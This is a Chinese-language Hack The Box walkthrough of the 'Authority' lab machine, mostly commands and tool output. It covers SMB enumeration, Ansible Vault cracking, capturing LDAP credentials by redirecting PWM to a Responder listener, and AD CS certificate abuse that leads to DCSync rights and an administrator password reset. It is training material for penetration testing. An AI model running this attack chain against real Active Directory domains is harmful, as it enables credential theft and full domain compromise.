HTB:Authority

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
└─$ nmap -Pn -p- 10.10.11.222 --min-rate=10000 -sV
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-16 23:48 EDT
Warning: 10.10.11.222 giving up on port because retransmission cap hit (10).
Nmap scan report for bogon (10.10.11.222)
Host is up (0.24s latency).
Not shown: 64857 closed tcp ports (conn-refused), 649 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-08-17 07:49:42Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8443/tcp  open  ssl/https-alt
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49578/tcp open  msrpc         Microsoft Windows RPC
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49693/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
49710/tcp open  msrpc         Microsoft Windows RPC
49717/tcp open  msrpc         Microsoft Windows RPC

smb连接

1
2
smbclient -L 10.10.11.222
smbclient \\\\10.10.11.222\\Development

Pasted image 20230817115037
发现存在 Ansible,一个配置管理工具,dump下文件

1
2
3
recurse on //递归
prompt //自动确认
mget *

破解hash

发现存在VAULT hash
Pasted image 20230817115211
破解hash
结果

1
2
3
pwm_admin_login: svc_pwm  
pwm_admin_password: pWm_@dm!N_!23  
ladap_admin_password: DevT3st@123

8443端口

8443端口为pwm应用,提示开启了configuration模式,可以不通过ldap认证,修改配置
Pasted image 20230817115426
用前面拿到的pwm密码,登录后,看到有ldap相关设置
Pasted image 20230817115719
其中密码用户为svc_ldap,密码不可见,前面有一个ldap连接地址,修改ldap连接地址为攻击机,攻击机使用responder监听,web界面中点击 test ldap profile 会发起ldap认证请求,攻击机中抓到了明文账号密码
Pasted image 20230817115853

winrm

evil-winrm连接后,获取交互式shell
Pasted image 20230818015424

提权

存在adcs环境

Pasted image 20230819010209

查找可以利用的模版

1
certipy find -target 10.10.11.222 -dc-ip 10.10.11.222 -u svc_ldap -p 'lDaP_1n_th3_cle4r!'  -vulnerable -stdout

发现有可以利用的模版
AUTHORITY.HTB\Domain Computers组代表机器账号,普通用户可以创建
Pasted image 20230819042204
创建机器账号

1
addcomputer.py -method 'LDAPS' -computer-name "pentest\$" -computer-pass password -dc-ip 10.10.11.222 authority.htb/svc_ldap:lDaP_1n_th3_cle4r! -debug

请求证书

1
2
3
4
5
6
7
8
9
$ certipy req -username 'pentest$'@authority.htb -password password -ca AUTHORITY-CA -target authority.authority.htb -template CorpVPN -upn administrator@authority.htb                  
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 24
[*] Got certificate with UPN 'administrator@authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

通过证书,请求tgt,报错

1
2
3
4
5
6
7
└─$ certipy auth -pfx administrator.pfx                                                                                                                                                    
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

尝试另一个工具

为svc_ldap添加dcsync权限

1
2
3
4
5
6
┌──(kali㉿kali)-[~/Desktop/PassTheCert/Python]
└─$ python3 passthecert.py -action modify_user -crt ../../../user.crt -key ../../../user.key -domain authority.htb -dc-ip 10.10.11.222 -target svc_ldap -elevate                           
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Granted user 'svc_ldap' DCSYNC rights!

dcsync导出admin hash

报错
Pasted image 20230819051950

尝试修改管理员密码

1
python3 passthecert.py -action modify_user -crt ../../../user.crt -key ../../../user.key -domain authority.htb -dc-ip 10.10.11.222 -target administrator -new-pass

Pasted image 20230819052027

psexec连接

1
psexec.py authority.htb/administrator:O00R3bR7yNV8tguJN3Ptp2XXnsbNmuJO@10.10.11.222

Pasted image 20230819053431